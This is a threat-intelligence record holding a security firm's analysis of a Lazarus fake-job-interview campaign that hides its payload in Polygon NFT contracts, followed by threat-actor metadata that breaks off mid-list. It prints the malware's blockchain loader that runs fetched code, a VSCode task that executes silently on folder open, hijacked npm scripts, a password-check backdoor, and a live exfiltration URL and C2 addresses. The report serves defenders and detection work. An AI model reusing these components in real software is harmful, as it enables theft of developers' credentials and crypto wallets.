{ "id": "cc43c575-cbf3-47ee-9498-68062c17d97b", "created_at": "2026-04-06T00:17:33.882419Z", "updated_at": "2026-04-10T03:38:20.196013Z", "deleted_at": null, "sha1_hash": "a3b6bbd6f3466af0804e0ff6857529171728d88a", "title": "Hunting Lazarus Part II: When the Dead Drop Moved to the Blockchain", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 126744, "plain_text": "Hunting Lazarus Part II: When the Dead Drop Moved to the\r\nBlockchain\r\nBy Red Asgard Threat Research Team\r\nPublished: 2026-01-23 · Archived: 2026-04-05 18:10:10 UTC\r\nIn Part I, Red Asgard's threat research team documented the Contagious Interview campaign: 1,000 Pastebin dead\r\ndrop accounts, a timing oracle vulnerability, and a custom binary protocol on port 22411. That infrastructure was\r\nbeing disrupted—accounts taken down, IPs blocked.\r\nEleven days later, we found a new sample. Same campaign. Evolved tactics. The dead drop resolver had moved to\r\nthe blockchain.\r\nThis report documents the first documented blockchain-based dead drop resolver used by Lazarus Group:\r\nPolygon NFT contracts as payload storage. Infrastructure that literally cannot be seized.\r\nKey Findings\r\nBlockchain DDR: Polygon NFT contracts storing malicious JavaScript—immutable and globally\r\nreplicated\r\nBrand impersonation: Attackers posed as real company Betfin with functional code and Figma designs\r\n3 concurrent campaigns: Diversified infrastructure across dedicated servers, bulletproof hosting, and\r\nVercel cloud\r\nJWT vulnerability cracked: Signing secret is \"secret\" —we forged tokens and captured fresh payloads\r\n72KB stealer module: Targeting 50+ wallet extensions, 10+ password managers, 60+ browsers\r\nThe Social Engineering Playbook\r\nDuring our investigation, we obtained a firsthand account from a target—a blockchain developer contacted\r\nthrough a mutual connection. The approach followed patterns we've documented across multiple Contagious\r\nInterview incidents.\r\nThe Approach\r\nThe attack began on LinkedIn. The attackers contacted the target's friend, who connected them with a business\r\npartner. The pitch: blockchain development work with claims of $6M raised and 18 months of runway. The\r\ncredibility signals were deliberate: specific funding numbers, concrete timelines, and a plausible backstory.\r\nThe Interview\r\nThe first call was scheduled but the attackers claimed they could only text chat due to \"technical issues.\" The\r\ncall was rescheduled—this time they appeared with voice only, no video.\r\nhttps://redasgard.com/blog/hunting-lazarus-part2-blockchain-dead-drop\r\nPage 1 of 11\n\nDuring the call, they urged the target to clone the repository and run the project in realtime so they could \"walk\r\nthrough and explain everything.\" When asked to run it on their own machine with screen sharing, they declined.\r\nThe code was initially shared on Bitbucket, but the final version was delivered as a private GitHub repository.\r\nPatterns We Identified\r\nBased on this account and our analysis, we compiled the red flags present:\r\n1. Text-only then voice-only calls with \"technical issues\" excuse\r\n2. Real-time code execution request\r\n3. Refused to demo on their own machine\r\n4. Bitbucket → private GitHub migration (evasion tactic)\r\n5. Pressure to clone and run immediately\r\n6. Unsolicited outreach with urgency framing\r\nDefensive Checklist for Developers\r\nWe recommend developers verify the following before opening any code repository from an unknown source:\r\nCan you verify the company exists (LinkedIn, Crunchbase, press)?\r\nDid you initiate the contact, or did they approach you?\r\nAre they willing to do a video call?\r\nWill they demo their product on their machine first?\r\nIs the repository older than 30 days with organic commit history?\r\nHave you inspected .vscode/ , package.json , and pre-commit hooks?\r\nIf any answer is \"no,\" proceed with extreme caution.\r\nThe Blockchain Dead Drop Resolver\r\nWhy They Made the Switch\r\nA dead drop resolver (DDR) provides malware with C2 configuration without connecting directly to attacker\r\ninfrastructure. In Part I, we documented 1,000 Pastebin accounts used for this purpose. Those accounts were being\r\ntaken down—we found 100% of a random sample returned 404.\r\nThe blockchain changes the equation:\r\nAspect Pastebin DDR Blockchain DDR\r\nTakedown Report to Pastebin Impossible\r\nCensorship Account suspension Cannot block without breaking blockchain access\r\nReplication Single server Every Polygon node globally\r\nhttps://redasgard.com/blog/hunting-lazarus-part2-blockchain-dead-drop\r\nPage 2 of 11\n\nAspect Pastebin DDR Blockchain DDR\r\nModification Edit paste Deploy new contract\r\nCost Free ~$0.01 per deployment\r\nTechnical Implementation\r\nThe malware uses two Polygon NFT contracts as payload storage:\r\nContract Addresses:\r\n0xad031E8d8877481337cD53E141C16A2201BB6F4d\r\n0xa80db78ff597c3D34cCAF3bdaC39f3E193595561\r\nEach contract implements a getMemo() function that returns obfuscated JavaScript:\r\nconst CONTRACT_ABI = [\r\n \"function getMemo() external view returns (string memory)\"\r\n];\r\nconst provider = new ethers.providers.JsonRpcProvider(process.env.POLYGON_RPC_URL);\r\nfor (const address of NFT_CONTRACT_ADDRESSES) {\r\n const contract = new ethers.Contract(address, CONTRACT_ABI, provider);\r\n const memo = await contract.getMemo();\r\n nftResults.push(memo);\r\n}\r\nconst payload = nftResults.join(\"\");\r\nnew Function(\"require\", payload)(require);\r\nThe new Function(\"require\", payload)(require) construct gives the fetched code full Node.js capabilities—\r\nfile system access, network operations, process spawning.\r\nWhy Blockchain?\r\n1. Cannot be seized: No server to take down, no account to suspend\r\n2. Looks legitimate: Web3 applications commonly query blockchain RPCs\r\n3. Immutable: Once deployed, the payload is permanent\r\n4. Globally replicated: Available from any Polygon RPC endpoint\r\n5. Easy rotation: Deploy new contract, update malware config\r\nDetection Challenges\r\nBlocking blockchain DDRs is difficult:\r\nhttps://redasgard.com/blog/hunting-lazarus-part2-blockchain-dead-drop\r\nPage 3 of 11\n\nBlocking polygon-rpc.com breaks legitimate Web3 applications\r\nContract addresses can be rotated via config update\r\nQuery traffic is HTTPS to legitimate RPC providers\r\nNo static signature—payload changes with each deployment\r\nThe Infection Chain\r\nTimeline: Folder Open to Full Compromise\r\nT+0ms: Victim opens project folder in VSCode\r\nT+50ms: VSCode parses .vscode/tasks.json\r\nT+100ms: Detects \"runOn\": \"folderOpen\" trigger\r\nT+150ms: Victim clicks \"Trust Workspace\"\r\nT+200ms: Task executes: npm install --silent --no-progress\r\nT+5s: npm install completes\r\nT+5.1s: Dependent task starts: node server/server.js\r\nT+5.3s: configureCollection() called\r\nT+5.5s: Polygon RPC query sent\r\nT+6s: Payload received from NFT contracts\r\nT+6.1s: new Function() executes payload\r\nT+6.2s: Info stealer active\r\nTotal time to compromise: ~6 seconds\r\nStage 1: VSCode Auto-Execution\r\nThe .vscode/tasks.json file is configured to execute on folder open:\r\n{\r\n \"tasks\": [{\r\n \"label\": \"run-backend\",\r\n \"command\": \"node server/server.js\",\r\n \"runOptions\": { \"runOn\": \"folderOpen\" },\r\n \"presentation\": {\r\n \"reveal\": \"never\",\r\n \"echo\": false,\r\n \"focus\": false\r\n }\r\n }]\r\n}\r\nThe \"reveal\": \"never\" setting ensures no terminal window appears.\r\nStage 2: npm Script Hijacking\r\nhttps://redasgard.com/blog/hunting-lazarus-part2-blockchain-dead-drop\r\nPage 4 of 11\n\nEvery npm script is prepended with malware execution:\r\n{\r\n \"scripts\": {\r\n \"start\": \"node server/server.js | react-scripts start\",\r\n \"build\": \"node server/server.js | react-scripts build\",\r\n \"test\": \"node server/server.js | react-scripts test\"\r\n }\r\n}\r\nThe pipe operator runs both commands in parallel. The React app starts normally while malware executes silently.\r\nStage 3-4: Blockchain Query → RAT Deployment\r\nThe initial payload establishes a RAT that beacons every 5 seconds. The C2 responds with a messages[] array\r\ncontaining additional modules.\r\nVM Evasion: The C2 checks MAC addresses—VirtualBox MACs ( 08:00:27:* ) are blocked. Only real\r\nhardware receives the stealer modules.\r\nStage 5: Info Stealer Active\r\nWe captured the stealer module (72KB) on 2026-01-21. Targeting scope:\r\nCrypto Wallets (50+): MetaMask, Phantom, Binance, Trust Wallet, Coinbase, Exodus, Keplr, and dozens\r\nmore\r\nPassword Managers (10+): 1Password, LastPass, Bitwarden, KeePass, DashLane\r\nBrowsers (60+): Chrome, Firefox, Brave, Edge, Safari, Tor Browser\r\nCredentials: ~/.ssh/ , ~/.aws/ , ~/.gnupg/\r\nKill Switch: If C2 returns responseCode == '-1' , all processes terminate.\r\nExfiltration target: http://87.236.177.9:3000/api/errorMessage\r\nThe Authentication Backdoor\r\nLine 39 of server/controllers/auth.js contains a subtle but critical backdoor:\r\n// Normal: const isMatch = await bcrypt.compare(password, user.password);\r\n// Actual:\r\nconst isMatch = true;\r\nImpact: Any password is accepted for any valid email address. If this application ever reached production,\r\nattackers would have full account access to every user.\r\nhttps://redasgard.com/blog/hunting-lazarus-part2-blockchain-dead-drop\r\nPage 5 of 11\n\nCover Story: Impersonating a Real Company\r\nUnlike typical fake company schemes, the attackers impersonated Betfin—a real cryptocurrency betting platform.\r\nThe Real Betfin\r\nBetfin is legitimate: founded in 2024, 11-50 employees, BET token on CoinMarketCap, and a LinkedIn presence.\r\nWhen victims Google \"Betfin,\" they find a real company—making social engineering significantly more effective.\r\nThe Functional Repository\r\nThe malware repository is a fully functional application:\r\nWorking Express.js backend on port 7777\r\nWebSocket-based real-time game logic\r\nReact frontend with proper routing\r\nLegitimate npm dependencies (express, socket.io, mongoose)\r\nA victim running npm start sees a real application loading—providing cover for background malware\r\nexecution.\r\nProfessional Design Assets\r\nThe attackers also shared a Figma design file (\"Betfin-Design\") with business partners:\r\n30+ high-fidelity mobile screens with consistent dark theme\r\n\"Staking\" section — matching Betfin's real product feature\r\nReferral tree diagrams — Betfin offers affiliate programs\r\nDashboard interfaces with charts and data visualizations\r\nWhy Brand Impersonation Works\r\n1. Due diligence passes — real company exists\r\n2. Token validates — CoinMarketCap listing\r\n3. Features align — staking, referrals match the real product\r\n4. Harder to detect — victim assumes they're joining an established project\r\nThis combination creates a social engineering package that passes most developers' vetting.\r\nCampaign Evolution: Part 1 vs Part 2\r\nAspect Part 1 (2026-01-09) Part 2 (2026-01-20)\r\nDead Drop Pastebin (1,000 accounts) Polygon blockchain\r\nPrimary C2 147.124.213.232 87.236.177.9\r\nhttps://redasgard.com/blog/hunting-lazarus-part2-blockchain-dead-drop\r\nPage 6 of 11\n\nAspect Part 1 (2026-01-09) Part 2 (2026-01-20)\r\nCampaign Token hkMrMq7, kmHgMq7 env08539\r\nNovel Finding Timing oracle, Z238 protocol Blockchain DDR\r\nAnalysis: The shift to blockchain DDR suggests Pastebin accounts were being disrupted. The new C2 IP indicates\r\ninfrastructure rotation. Eleven days between samples—they're iterating quickly.\r\nNew Campaign: Vercel-Hosted C2 (31df390f0305)\r\nDuring active reconnaissance on 2026-01-21, we identified a third concurrent campaign using entirely different\r\ninfrastructure: Vercel cloud hosting.\r\nC2 Domain: codeviewer-three.vercel.app Sample: github.com/Postilize-Tech/defiguard-dev.git\r\nThis represents another evolution: legitimate cloud platforms as C2 infrastructure. Unlike bulletproof hosting,\r\nVercel is a mainstream platform—making blocklisting significantly more difficult.\r\nJWT Anti-Analysis (3-Minute Expiry)\r\nThe Vercel campaign implements JWT-based session tracking:\r\n{\r\n \"ip\": \"\u003cvictim_ip\u003e\",\r\n \"sessionId\": \"\u003cuuid\u003e\",\r\n \"step\": 1,\r\n \"origToken\": \"31df390f0305\",\r\n \"exp\": \"\u003cunix+180\u003e\"\r\n}\r\nIf analysts don't execute within 180 seconds, tokens expire and subsequent stages fail.\r\nCritical Finding: JWT Secret Cracked\r\nThe JWT signing secret is trivially weak: \"secret\"\r\nThis allowed us to forge valid tokens, bypass IP binding, and capture fresh payloads from all infection stages.\r\nUser-Agent Based Access Control\r\nStage 2 endpoints block analysis tools:\r\nUser-Agent Result\r\npython-requests/* 403 - Blocked\r\nhttps://redasgard.com/blog/hunting-lazarus-part2-blockchain-dead-drop\r\nPage 7 of 11\n\nUser-Agent Result\r\nWget/1.21 200 - Full payload\r\nThe malware uses wget/curl while analysis tools use Python requests—filtering most automated sandboxes.\r\nThree Concurrent Campaigns\r\nCampaign Infrastructure C2\r\nhkMrMq7 Dedicated servers (Majestic Hosting) 147.124.x.x family\r\nenv08539 Bulletproof + blockchain DDR 87.236.177.9\r\n31df390f0305 Legitimate cloud (Vercel) + JWT codeviewer-three.vercel.app\r\nThis diversification suggests operational maturity—if one infrastructure is disrupted, operations continue through\r\nothers.\r\nDefensive Recommendations\r\nCritical: VSCode Workspace Trust\r\nEnable Workspace Trust organization-wide. This is the single most effective mitigation.\r\n{\r\n \"security.workspace.trust.enabled\": true,\r\n \"security.workspace.trust.untrustedFiles\": \"prompt\"\r\n}\r\nDetection Hunts\r\n1. Audit .vscode/tasks.json for \"runOn\": \"folderOpen\"\r\nfind ~ -path \"*/.vscode/tasks.json\" -exec grep -l \"folderOpen\" {} \\;\r\n2. Check package.json for script hijacking patterns\r\ngrep -r \"node.*|.*react-scripts\" --include=\"package.json\"\r\n3. Block C2 IP\r\niptables -A OUTPUT -d 87.236.177.9 -j DROP\r\nhttps://redasgard.com/blog/hunting-lazarus-part2-blockchain-dead-drop\r\nPage 8 of 11\n\n4. Monitor blockchain RPC from backend servers\r\nBackend services shouldn't query Polygon unless they're Web3 applications\r\nAlert on polygon-rpc.com from non-frontend processes\r\nMITRE ATT\u0026CK Mapping\r\nID Technique Evidence\r\nT1566.003 Phishing via Service LinkedIn fake recruiter\r\nT1204.002 Malicious File VSCode auto-execution\r\nT1059.007 JavaScript All payloads\r\nT1102.001 Dead Drop Resolver Polygon NFT contracts (new variant)\r\nT1555 Credential Access Wallet/browser theft\r\nT1041 Exfiltration Over C2 HTTP POST to /api/errorMessage\r\nNew Technique Variant: T1102.001 traditionally covers web services. This sample demonstrates blockchain-based DDR—a novel application not yet reflected in ATT\u0026CK documentation.\r\nIOC Summary\r\nFile Hashes (SHA256)\r\nHash File\r\ne695f6628abade062d5a2310e16c5b2d1707795c0214b939d328e0772a776fea .vscode/tasks.json\r\n43223ce324e65b694bb8dd6bbf7992e29f75605a366532fe993bfdd924193f84 server/controllers/collection.js\r\n3e2d9bcf6ff5ae441493df87e8c46b68c12985d88152cd4ab047b236a77dd30d package.json\r\nNetwork Indicators\r\nIndicator Type Role\r\n87.236.177.9:3000 IP:Port Primary C2 (env08539)\r\ncodeviewer-three.vercel.app Domain Vercel C2 (31df390f0305)\r\n11.34.242.92 IP NEW C2 (from deobfuscation)\r\n147.124.212.125 IP Active socket C2\r\nhttps://redasgard.com/blog/hunting-lazarus-part2-blockchain-dead-drop\r\nPage 9 of 11\n\nIndicator Type Role\r\n66.235.168.238 IP Active socket C2\r\n45.59.163.55 IP Active socket C2\r\n0xad031E8d8877481337cD53E141C16A2201BB6F4d Polygon Contract DDR #1\r\n0xa80db78ff597c3D34cCAF3bdaC39f3E193595561 Polygon Contract DDR #2\r\nCampaign Tokens\r\nToken Purpose\r\n31df390f0305 Vercel campaign (defiguard-dev)\r\nenv08539 EuroHoster campaign\r\nhkMrMq7 Majestic Hosting campaign\r\nkmHgMq7 Secondary campaign\r\nA Practitioner's Perspective\r\nThe blockchain DDR represents a meaningful evolution in C2 resilience. When Pastebin accounts get taken down,\r\noperators need alternatives. When those alternatives include infrastructure that cannot be seized, defenders have\r\nfewer options.\r\nThis doesn't make detection impossible—monitoring for blockchain library usage in unexpected contexts is still\r\neffective. But it does raise the bar for disruption.\r\nFor organizations: if you're hiring crypto developers through Upwork, Fiverr, or similar platforms, you're in the\r\ntarget zone. Vet repositories before opening them. Disable VSCode auto-run tasks. Review package.json scripts\r\nbefore running npm install .\r\nFor threat hunters: the blockchain DDR provides immediate detection opportunities—monitor for ethers.js or\r\nWeb3 library usage in applications without blockchain functionality, and alert on Polygon RPC queries from\r\nbackend servers. The brand impersonation angle also offers investigative leads: cross-reference recruitment\r\noutreach against legitimate company employee directories.\r\nHow Red Asgard Can Help\r\nThis investigation originated from our freelancer code vetting practice—a service we offer to organizations that\r\noutsource development work.\r\nContractor Code Review\r\nhttps://redasgard.com/blog/hunting-lazarus-part2-blockchain-dead-drop\r\nPage 10 of 11\n\nRepository analysis before code integration\r\nMalware and backdoor detection\r\nSupply chain risk assessment\r\nFreelancer background verification\r\nThreat Intelligence\r\nAPT campaign tracking (Lazarus, Kimsuky, APT41)\r\nIOC feeds and alerting\r\nCustom threat hunting\r\nIncident response support\r\nSecurity Assessments\r\nApplication security testing\r\nInfrastructure penetration testing\r\nAI/ML security review\r\nRed team engagements\r\nIf you're outsourcing development work—especially in crypto or Web3—we'd welcome the opportunity to discuss\r\nyour security posture.\r\nContact: contact@redasgard.com\r\nReferences\r\nPart I: Hunting Lazarus: Inside the Contagious Interview C2 Infrastructure\r\nSentinelOne: Contagious Interview\r\nSekoia: ClickFake Interview Campaign\r\nMITRE ATT\u0026CK: Contagious Interview (G1052)\r\nShare this article\r\nHelp spread the word about security best practices.\r\nSource: https://redasgard.com/blog/hunting-lazarus-part2-blockchain-dead-drop\r\nhttps://redasgard.com/blog/hunting-lazarus-part2-blockchain-dead-drop\r\nPage 11 of 11\n\nAspect Dead Drop Part 1 (2026-01-09) Pastebin (1,000 accounts) Part 2 (2026-01-20) Polygon blockchain\nPrimary C2 147.124.213.232 87.236.177.9\n Page 6 of 11", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia" ], "references": [ "https://redasgard.com/blog/hunting-lazarus-part2-blockchain-dead-drop" ], "report_names": [ "hunting-lazarus-part2-blockchain-dead-drop" ], "threat_actors": [ { "id": "b740943a-da51-4133-855b-df29822531ea", "created_at": "2022-10-25T15:50:23.604126Z", "updated_at": "2026-04-10T02:00:05.259593Z", "deleted_at": null, "main_name": "Equation", "aliases": [ "Equation" ], "source_name": "MITRE:Equation", "tools": null, "source_id": "MITRE", "reports": null }, { "id": "34eea331-d052-4096-ae03-a22f1d090bd4", "created_at": "2025-08-07T02:03:25.073494Z", "updated_at": "2026-04-10T02:00:03.709243Z", "deleted_at": null, "main_name": "NICKEL ACADEMY", "aliases": [ "ATK3 ", "Black Artemis ", "COVELLITE ", "CTG-2460 ", "Citrine Sleet ", "Diamond Sleet ", "Guardians of Peace", "HIDDEN COBRA ", "High Anonymous", "Labyrinth Chollima ", "Lazarus Group ", "NNPT Group", "New Romanic Cyber Army Team", "Temp.Hermit ", "UNC577 ", "Who Am I?", "Whois Team", "ZINC " ], "source_name": "Secureworks:NICKEL ACADEMY", "tools": [ "Destover", "KorHigh", "Volgmer" ], "source_id": "Secureworks", "reports": null }, { "id": "191d7f9a-8c3c-442a-9f13-debe259d4cc2", "created_at": "2022-10-25T15:50:23.280374Z", "updated_at": "2026-04-10T02:00:05.305572Z", "deleted_at": null, "main_name": "Kimsuky", "aliases": [ "Kimsuky", "Black Banshee", "Velvet Chollima", "Emerald Sleet", "THALLIUM", "APT43", "TA427", "Springtail" ], "source_name": "MITRE:Kimsuky", "tools": [ "Troll Stealer", "schtasks", "Amadey", "GoBear", "Brave Prince", "CSPY Downloader", "gh0st RAT", "AppleSeed", "Gomir", "NOKKI", "QuasarRAT", "Gold Dragon", "PsExec", "KGH_SPY", "Mimikatz", "BabyShark", "TRANSLATEXT" ], "source_id": "MITRE", "reports": null }, { "id": "4fc99d9b-9b66-4516-b0db-520fbef049ed", "created_at": "2025-10-29T02:00:51.949631Z", "updated_at": "2026-04-10T02:00:05.346203Z", "deleted_at": null, "main_name": "Contagious Interview", "aliases": [ "Contagious Interview", "DeceptiveDevelopment", "Gwisin Gang", "Tenacious Pungsan", "DEV#POPPER", "PurpleBravo", "TAG-121" ], "source_name": "MITRE:Contagious Interview", "tools": [ "InvisibleFerret", "BeaverTail", "XORIndex Loader", "HexEval Loader" ], "source_id": "MITRE", "reports": null }, { "id": "760f2827-1718-4eed-8234-4027c1346145", "created_at": "2023-01-06T13:46:38.670947Z", "updated_at": "2026-04-10T02:00:03.062424Z", "deleted_at": null, "main_name": "Kimsuky", "aliases": [ "G0086", "Emerald Sleet", "THALLIUM", "Springtail", "Sparkling Pisces", "Thallium", "Operation Stolen Pencil", "APT43", "Velvet Chollima", "Black Banshee" ], "source_name": "MISPGALAXY:Kimsuky", "tools": [ "xrat", "QUASARRAT", "RDP Wrapper", "TightVNC", "BabyShark", "RevClient" ], "source_id": "MISPGALAXY", "reports": null }, { "id": "4d5f939b-aea9-4a0e-8bff-003079a261ea", "created_at": "2023-01-06T13:46:39.04841Z", "updated_at": "2026-04-10T02:00:03.196806Z", "deleted_at": null, "main_name": "APT41", "aliases": [ "WICKED PANDA", "BRONZE EXPORT", "Brass Typhoon", "TG-2633", "Leopard Typhoon", "G0096", "Grayfly", "BARIUM", "BRONZE ATLAS", "Red Kelpie", "G0044", "Earth Baku", "TA415", "WICKED SPIDER", "HOODOO", "Winnti", "Double Dragon" ], "source_name": "MISPGALAXY:APT41", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "e698860d-57e8-4780-b7c3-41e5a8314ec0", "created_at": "2022-10-25T15:50:23.287929Z", "updated_at": "2026-04-10T02:00:05.329769Z", "deleted_at": null, "main_name": "APT41", "aliases": [ "APT41", "Wicked Panda", "Brass Typhoon", "BARIUM" ], "source_name": "MITRE:APT41", "tools": [ "ASPXSpy", "BITSAdmin", "PlugX", "Impacket", "gh0st RAT", "netstat", "PowerSploit", "ZxShell", "KEYPLUG", "LightSpy", "ipconfig", "sqlmap", "China Chopper", "ShadowPad", "MESSAGETAP", "Mimikatz", "certutil", "njRAT", "Cobalt Strike", "pwdump", "BLACKCOFFEE", "MOPSLED", "ROCKBOOT", "dsquery", "Winnti for Linux", "DUSTTRAP", "Derusbi", "ftp" ], "source_id": "MITRE", "reports": null }, { "id": "732597b1-40a8-474c-88cc-eb8a421c29f1", "created_at": "2025-08-07T02:03:25.087732Z", "updated_at": "2026-04-10T02:00:03.776007Z", "deleted_at": null, "main_name": "NICKEL GLADSTONE", "aliases": [ "APT38 ", "ATK 117 ", "Alluring Pisces ", "Black Alicanto ", "Bluenoroff ", "CTG-6459 ", "Citrine Sleet ", "HIDDEN COBRA ", "Lazarus Group", "Sapphire Sleet ", "Selective Pisces ", "Stardust Chollima ", "T-APT-15 ", "TA444 ", "TAG-71 " ], "source_name": "Secureworks:NICKEL GLADSTONE", "tools": [ "AlphaNC", "Bankshot", "CCGC_Proxy", "Ratankba", "RustBucket", "SUGARLOADER", "SwiftLoader", "Wcry" ], "source_id": "Secureworks", "reports": null }, { "id": "c8bf82a7-6887-4d46-ad70-4498b67d4c1d", "created_at": "2025-08-07T02:03:25.101147Z", "updated_at": "2026-04-10T02:00:03.846812Z", "deleted_at": null, "main_name": "NICKEL KIMBALL", "aliases": [ "APT43 ", "ARCHIPELAGO ", "Black Banshee ", "Crooked Pisces ", "Emerald Sleet ", "ITG16 ", "Kimsuky ", "Larva-24005 ", "Opal Sleet ", "Ruby Sleet ", "SharpTongue ", "Sparking Pisces ", "Springtail ", "TA406 ", "TA427 ", "THALLIUM ", "UAT-5394 ", "Velvet Chollima " ], "source_name": "Secureworks:NICKEL KIMBALL", "tools": [ "BabyShark", "FastFire", "FastSpy", "FireViewer", "Konni" ], "source_id": "Secureworks", "reports": null }, { "id": "2a24d664-6a72-4b4c-9f54-1553b64c453c", "created_at": "2025-08-07T02:03:24.553048Z", "updated_at": "2026-04-10T02:00:03.787296Z", "deleted_at": null, "main_name": "BRONZE ATLAS", "aliases": [ "APT41 ", "BARIUM ", "Blackfly ", "Brass Typhoon", "CTG-2633", "Earth Baku ", "GREF", "Group 72 ", "Red Kelpie ", "TA415 ", "TG-2633 ", "Wicked Panda ", "Winnti" ], "source_name": "Secureworks:BRONZE ATLAS", "tools": [ "Acehash", "CCleaner v5.33 backdoor", "ChinaChopper", "Cobalt Strike", "DUSTPAN", "Dicey MSDN", "Dodgebox", "ForkPlayground", "HUC Proxy Malware (Htran)" ], "source_id": "Secureworks", "reports": null }, { "id": "a2b92056-9378-4749-926b-7e10c4500dac", "created_at": "2023-01-06T13:46:38.430595Z", "updated_at": "2026-04-10T02:00:02.971571Z", "deleted_at": null, "main_name": "Lazarus Group", "aliases": [ "Operation DarkSeoul", "Bureau 121", "Group 77", "APT38", "NICKEL GLADSTONE", "G0082", "COPERNICIUM", "Moonstone Sleet", "Operation GhostSecret", "APT 38", "Appleworm", "Unit 121", "ATK3", "G0032", "ATK117", "NewRomanic Cyber Army Team", "Nickel Academy", "Sapphire Sleet", "Lazarus group", "Hastati Group", "Subgroup: Bluenoroff", "Operation Troy", "Black Artemis", "Dark Seoul", "Andariel", "Labyrinth Chollima", "Operation AppleJeus", "COVELLITE", "Citrine Sleet", "DEV-0139", "DEV-1222", "Hidden Cobra", "Bluenoroff", "Stardust Chollima", "Whois Hacking Team", "Diamond Sleet", "TA404", "BeagleBoyz", "APT-C-26" ], "source_name": "MISPGALAXY:Lazarus Group", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "32a223a8-3c79-4146-87c5-8557d38662ae", "created_at": "2022-10-25T15:50:23.703698Z", "updated_at": "2026-04-10T02:00:05.261989Z", "deleted_at": null, "main_name": "Lazarus Group", "aliases": [ "Lazarus Group", "Labyrinth Chollima", "HIDDEN COBRA", "Guardians of Peace", "NICKEL ACADEMY", "Diamond Sleet" ], "source_name": "MITRE:Lazarus Group", "tools": [ "RawDisk", "Proxysvc", "BADCALL", "FALLCHILL", "WannaCry", "MagicRAT", "HOPLIGHT", "TYPEFRAME", "Dtrack", "HotCroissant", "HARDRAIN", "Dacls", "KEYMARBLE", "TAINTEDSCRIBE", "AuditCred", "netsh", "ECCENTRICBANDWAGON", "AppleJeus", "BLINDINGCAN", "ThreatNeedle", "Volgmer", "Cryptoistic", "RATANKBA", "Bankshot" ], "source_id": "MITRE", "reports": null }, { "id": "71a1e16c-3ba6-4193-be62-be53527817bc", "created_at": "2022-10-25T16:07:23.753455Z", "updated_at": "2026-04-10T02:00:04.73769Z", "deleted_at": null, "main_name": "Kimsuky", "aliases": [ "APT 43", "Black Banshee", "Emerald Sleet", "G0086", "G0094", "ITG16", "KTA082", "Kimsuky", "Larva-24005", "Larva-25004", "Operation Baby Coin", "Operation Covert Stalker", "Operation DEEP#DRIVE", "Operation DEEP#GOSU", "Operation Kabar Cobra", "Operation Mystery Baby", "Operation Red Salt", "Operation Smoke Screen", "Operation Stealth Power", "Operation Stolen Pencil", "SharpTongue", "Sparkling Pisces", "Springtail", "TA406", "TA427", "Thallium", "UAT-5394", "Velvet Chollima" ], "source_name": "ETDA:Kimsuky", "tools": [ "AngryRebel", "AppleSeed", "BITTERSWEET", "BabyShark", "BoBoStealer", "CSPY Downloader", "Farfli", "FlowerPower", "Gh0st RAT", "Ghost RAT", "Gold Dragon", "GoldDragon", "GoldStamp", "JamBog", "KGH Spyware Suite", "KGH_SPY", "KPortScan", "KimJongRAT", "Kimsuky", "LATEOP", "LOLBAS", "LOLBins", "Living off the Land", "Lovexxx", "MailPassView", "Mechanical", "Mimikatz", "MoonPeak", "Moudour", "MyDogs", "Mydoor", "Network Password Recovery", "PCRat", "ProcDump", "PsExec", "ReconShark", "Remote Desktop PassView", "SHARPEXT", "SWEETDROP", "SmallTiger", "SniffPass", "TODDLERSHARK", "TRANSLATEXT", "Troll Stealer", "TrollAgent", "VENOMBITE", "WebBrowserPassView", "xRAT" ], "source_id": "ETDA", "reports": null }, { "id": "f32df445-9fb4-4234-99e0-3561f6498e4e", "created_at": "2022-10-25T16:07:23.756373Z", "updated_at": "2026-04-10T02:00:04.739611Z", "deleted_at": null, "main_name": "Lazarus Group", "aliases": [ "APT-C-26", "ATK 3", "Appleworm", "Citrine Sleet", "DEV-0139", "Diamond Sleet", "G0032", "Gleaming Pisces", "Gods Apostles", "Gods Disciples", "Group 77", "Guardians of Peace", "Hastati Group", "Hidden Cobra", "ITG03", "Jade Sleet", "Labyrinth Chollima", "Lazarus Group", "NewRomanic Cyber Army Team", "Operation 99", "Operation AppleJeus", "Operation AppleJeus sequel", "Operation Blockbuster: Breach of Sony Pictures Entertainment", "Operation CryptoCore", "Operation Dream Job", "Operation Dream Magic", "Operation Flame", "Operation GhostSecret", "Operation In(ter)caption", "Operation LolZarus", "Operation Marstech Mayhem", "Operation No Pineapple!", "Operation North Star", "Operation Phantom Circuit", "Operation Sharpshooter", "Operation SyncHole", "Operation Ten Days of Rain / DarkSeoul", "Operation Troy", "SectorA01", "Slow Pisces", "TA404", "TraderTraitor", "UNC2970", "UNC4034", "UNC4736", "UNC4899", "UNC577", "Whois Hacking Team" ], "source_name": "ETDA:Lazarus Group", "tools": [ "3CX Backdoor", "3Rat Client", "3proxy", "AIRDRY", "ARTFULPIE", "ATMDtrack", "AlphaNC", "Alreay", "Andaratm", "AngryRebel", "AppleJeus", "Aryan", "AuditCred", "BADCALL", "BISTROMATH", "BLINDINGCAN", "BTC Changer", "BUFFETLINE", "BanSwift", "Bankshot", "Bitrep", "Bitsran", "BlindToad", "Bookcode", "BootWreck", "BottomLoader", "Brambul", "BravoNC", "Breut", "COLDCAT", "COPPERHEDGE", "CROWDEDFLOUNDER", "Castov", "CheeseTray", "CleanToad", "ClientTraficForwarder", "CollectionRAT", "Concealment Troy", "Contopee", "CookieTime", "Cyruslish", "DAVESHELL", "DBLL Dropper", "DLRAT", "DRATzarus", "DRATzarus RAT", "Dacls", "Dacls RAT", "DarkComet", "DarkKomet", "DeltaCharlie", "DeltaNC", "Dembr", "Destover", "DoublePulsar", "Dozer", "Dtrack", "Duuzer", "DyePack", "ECCENTRICBANDWAGON", "ELECTRICFISH", "Escad", "EternalBlue", "FALLCHILL", "FYNLOS", "FallChill RAT", "Farfli", "Fimlis", "FoggyBrass", "FudModule", "Fynloski", "Gh0st RAT", "Ghost RAT", "Gopuram", "HARDRAIN", "HIDDEN COBRA RAT/Worm", "HLOADER", "HOOKSHOT", "HOPLIGHT", "HOTCROISSANT", "HOTWAX", "HTTP Troy", "Hawup", "Hawup RAT", "Hermes", "HotCroissant", "HotelAlfa", "Hotwax", "HtDnDownLoader", "Http Dr0pper", "ICONICSTEALER", "Joanap", "Jokra", "KANDYKORN", "KEYMARBLE", "Kaos", "KillDisk", "KillMBR", "Koredos", "Krademok", "LIGHTSHIFT", "LIGHTSHOW", "LOLBAS", "LOLBins", 